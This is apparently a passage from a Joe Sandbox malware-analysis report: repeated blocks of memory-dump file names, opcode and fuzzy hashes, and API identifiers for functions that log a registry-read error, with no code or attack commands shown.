                                                      • Opcode Fuzzy Hash: 39aaf49a42b38c45c43456f641b73758d388b580c46ae1c3321e64665559df8d
                                                      • Instruction Fuzzy Hash: 0BF02BA260874742E952AF10FC80BF6F654EF40798FC80236ED1E47694DF3CD9899310
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 9ee8d6b3311edb7c6a60458bba9abb73d307667f613677e60545acc50e7dab72
                                                      • Instruction ID: 03f7923b9088ee33068ceb0fe19b2217b9dbb512656afe9bbb206b9b9fb9930a
                                                      • Opcode Fuzzy Hash: 9ee8d6b3311edb7c6a60458bba9abb73d307667f613677e60545acc50e7dab72
                                                      • Instruction Fuzzy Hash: 55F02BA660874741E952AF10FC80BF6B658EF40798FC80236ED1E47694DF3CD9899310
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 290ae42efc0832579e058e7bb1e772215776ba7f21648772df87130b8cef0840
                                                      • Instruction ID: 786f4642835081cb1c49c6c7cb6fcf26c7ba74a96d23910cc24b65fc36636407
                                                      • Opcode Fuzzy Hash: 290ae42efc0832579e058e7bb1e772215776ba7f21648772df87130b8cef0840
                                                      • Instruction Fuzzy Hash: 11F0F6A260874641E952AF10FC80BF6B654EF40798F880236ED1E47694DF3CD9899310
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2875701630.00007FF70CAD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF70CAD0000, based on PE: true
                                                      • Associated: 00000018.00000002.2875680611.00007FF70CAD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875724531.00007FF70CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875747768.00007FF70CAEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                      • Associated: 00000018.00000002.2875818432.00007FF70CAEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ff70cad0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 0738e5f813ccfdbd9946cf18aed2d39c3dbbb2a30a0980b77edb6c20e24c00d2
                                                      • Instruction ID: 2f1aecae67bf9288b74fe209941c90baf6f692e60be8fafaa469cb66448c9744
                                                      • Opcode Fuzzy Hash: 0738e5f813ccfdbd9946cf18aed2d39c3dbbb2a30a0980b77edb6c20e24c00d2
                                                      • Instruction Fuzzy Hash: 8BF02BA270874B41E952AF10FC80BF6B654EF40798FC80236ED1E47694DF3CD9899310
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 3c326c85f4fbd7045fafec4e4325012b0594580087f6753e4e477236207a0945
                                                      • Instruction ID: 74c61854085bc61770685bbaeb8ac29f65e47a4d8ef8c052865cb6d2ffef7bcd
                                                      • Opcode Fuzzy Hash: 3c326c85f4fbd7045fafec4e4325012b0594580087f6753e4e477236207a0945
                                                      • Instruction Fuzzy Hash: D0F0C816B0E20F91E5538F10F8503756154BF42BA4F440535DD4D46392EF3CE9499304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: d3d339eb22bdab7e5068ddab6fb510791d3596b47e2fd97ad28925f9d593c78f
                                                      • Instruction ID: e1732909d6b9188d32cfd5234b67851615f7ab47309ac623425dd47753d44a47
                                                      • Opcode Fuzzy Hash: d3d339eb22bdab7e5068ddab6fb510791d3596b47e2fd97ad28925f9d593c78f
                                                      • Instruction Fuzzy Hash: 3CF0F626B0F20F92E6538F10F8503B96294BF42FA4F480539DD4C4A3A2EF3CE9499308
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: d324351d120e8f53e3cbf5c41f81da0bd99e8f43cb9e228ad8fc60879fc627cd
                                                      • Instruction ID: 3a27e9c7c799558ae2f7f565583c9017a00ec32f8680ad94a036c4070f1abd80
                                                      • Opcode Fuzzy Hash: d324351d120e8f53e3cbf5c41f81da0bd99e8f43cb9e228ad8fc60879fc627cd
                                                      • Instruction Fuzzy Hash: 91F0C816B0E20F91E5538F10F8503756154BF42BA4F440535DD4D46392DF3CE9499304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: ad59f99245fa03fbe69d5b6fb3e20d57b0d5a9e1a5f81e0c1c6902b27cefe1cc
                                                      • Instruction ID: 33a1fed0122685040716a00cba45101c58e8b2082aca6c8ec447ad541c515ff7
                                                      • Opcode Fuzzy Hash: ad59f99245fa03fbe69d5b6fb3e20d57b0d5a9e1a5f81e0c1c6902b27cefe1cc
                                                      • Instruction Fuzzy Hash: 7BF0FC16B0F20F92E5538F10F8503756154BF42FA4F440535DD4D46792DF3CE9499304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877001034.00007FFDA5571000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFDA5570000, based on PE: true
                                                      • Associated: 00000018.00000002.2876982499.00007FFDA5570000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877024032.00007FFDA5584000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877044088.00007FFDA558D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877061446.00007FFDA5590000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877078821.00007FFDA5591000.00000008.00000001.01000000.00000010.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5570000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: ca098c04c38a53cda2ce60607ad5913827e2cdc37d9062dacfc7512572ea4e5e
                                                      • Instruction ID: 82b7fa0c5bf319613c9965e77028eea6cbd4d4f96d9d25d1de9356f24b87c6f1
                                                      • Opcode Fuzzy Hash: ca098c04c38a53cda2ce60607ad5913827e2cdc37d9062dacfc7512572ea4e5e
                                                      • Instruction Fuzzy Hash: 80F0C816B0E20F91E6538F10F8503756194BF42BA4F480135DD4D46792DF3CD9499304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 10bfcb33f060f6027eaff80277b33630d85b4bf41a5f3a3034f3e002bba8d5be
                                                      • Instruction ID: 4e1970c31367cbfe1c08ac25cfb84bcb1fff30bd298e81aea6dbdac0976947c8
                                                      • Opcode Fuzzy Hash: 10bfcb33f060f6027eaff80277b33630d85b4bf41a5f3a3034f3e002bba8d5be
                                                      • Instruction Fuzzy Hash: 52F0FC52709B0E47E9528F00B8503BA6144BF42F96F080235EE5D46792DF6EEA859304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: bbf665d4db6d690a83c84e824dc23039c9886c6c1d3ea90658e1f35076a3aa27
                                                      • Instruction ID: 21adb2cf948d7bb6d3bec6cebabde5cdb780e059e31f90a14e1694d3f4a8ca08
                                                      • Opcode Fuzzy Hash: bbf665d4db6d690a83c84e824dc23039c9886c6c1d3ea90658e1f35076a3aa27
                                                      • Instruction Fuzzy Hash: B8F0FC52709A0E47E9528F00B8503BA6144BF42F96F040135EE5D4A792DF6EEA459704
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 805c7d7653d775cac45aba51234388f41b1c5ce80cc353cd24e6bcbff795ee86
                                                      • Instruction ID: f6eabf957951688f7fc9255f9d616638ba11e4212091a53eb5d0353b9db1e4c3
                                                      • Opcode Fuzzy Hash: 805c7d7653d775cac45aba51234388f41b1c5ce80cc353cd24e6bcbff795ee86
                                                      • Instruction Fuzzy Hash: 7BF0FC52709A0E47E9528F00B8503BA6144FF42F96F040135EE5D4A792DF6EEA459304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 1aa315c62f3d8ffb2293b5c4ba76ef99169c468e844d2112630f02c2f2b8fce3
                                                      • Instruction ID: d9576b49dee2f9a910caa1c3dec52000d23af56aac91e52cf474eb1bb6a75fae
                                                      • Opcode Fuzzy Hash: 1aa315c62f3d8ffb2293b5c4ba76ef99169c468e844d2112630f02c2f2b8fce3
                                                      • Instruction Fuzzy Hash: 96F0FC52709A0E47E9524F00F8503BA6144BF42F96F040135EE5D4A7D2DF6EEA459304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877497237.00007FFDA5BA1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFDA5BA0000, based on PE: true
                                                      • Associated: 00000018.00000002.2877479127.00007FFDA5BA0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877517769.00007FFDA5BB0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877541333.00007FFDA5BB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877562004.00007FFDA5BBB000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877582176.00007FFDA5BBC000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffda5ba0000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: cd47fd6be89d19279995e972b41bed2155c15cdd2ada443eb605640005e1e961
                                                      • Instruction ID: efe85a71f2e1b147335d77aaef4944eaaa7d5d481adca07a4ad9e924bceba2db
                                                      • Opcode Fuzzy Hash: cd47fd6be89d19279995e972b41bed2155c15cdd2ada443eb605640005e1e961
                                                      • Instruction Fuzzy Hash: 08F0FC52709B0E47E9528F00B8503BA6144BF42F96F040235EE5D4A792EF6EEA459304
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 1883397dd7743ef319c74546f1c8ad4120f441726be8aac45c62918205eb1254
                                                      • Instruction ID: 565697c0d3e2f4879a854fdbb5518332ca22147fe16228a0aa2197bb27ec5f70
                                                      • Opcode Fuzzy Hash: 1883397dd7743ef319c74546f1c8ad4120f441726be8aac45c62918205eb1254
                                                      • Instruction Fuzzy Hash: FEF0F667B0A74685E553AF00F8503BA2254EF803F4F480235DD4D4A792EF2DD985C309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 5d8f02b3bbd0833f1c1b99639b544f515b7be5ad4266852ad3d7312289d1ffed
                                                      • Instruction ID: 51307661d60d0e6e917c43edafa466381f4026661155d7a0a54163d93d837d44
                                                      • Opcode Fuzzy Hash: 5d8f02b3bbd0833f1c1b99639b544f515b7be5ad4266852ad3d7312289d1ffed
                                                      • Instruction Fuzzy Hash: 96F0C267B0A74685E553AB00F8503BA2254EF803F4F480135DD4C4A792EF2DD989C309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 52dca2a1af83625b1d8857baa4ea338c45c588a9b07942b8c83f83f663b0948b
                                                      • Instruction ID: d3631d61e1cefd16d0cf2ae8e99726d574e44e63accd9a14757644e7001e39bc
                                                      • Opcode Fuzzy Hash: 52dca2a1af83625b1d8857baa4ea338c45c588a9b07942b8c83f83f663b0948b
                                                      • Instruction Fuzzy Hash: 21F0F667B0A74685E553AF00F8503BA2254EF803F4F480136DD4D4A792EF2DD985C309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: a94f2b3a59f03209f560b29cced447069f7cefbb190824f2e4c7ec8b15025579
                                                      • Instruction ID: fcdcd5c9a64effc92a33513493f42d7e8fef4bb32111dbc8d766c84b21377fce
                                                      • Opcode Fuzzy Hash: a94f2b3a59f03209f560b29cced447069f7cefbb190824f2e4c7ec8b15025579
                                                      • Instruction Fuzzy Hash: FBF0F667B0A74686E553AF00F8503BA6254EF803F4F480136DD4D4A792EF2DD985C309
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000018.00000002.2877759914.00007FFDAC121000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDAC120000, based on PE: true
                                                      • Associated: 00000018.00000002.2877741063.00007FFDAC120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877782121.00007FFDAC133000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877800925.00007FFDAC134000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877820251.00007FFDAC13D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877861990.00007FFDAC140000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877881610.00007FFDAC141000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                      • Associated: 00000018.00000002.2877900519.00007FFDAC144000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_24_2_7ffdac120000_main.jbxd
                                                      Similarity
                                                      • API ID: Closefflushfwrite
                                                      • String ID: [E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$registry_get_value
                                                      • API String ID: 1001908780-1680961811
                                                      • Opcode ID: 7fbede9ab6e892917caa8e9ff9fa6b1114ec0e30d3f62a1383d5cde42ff6b701
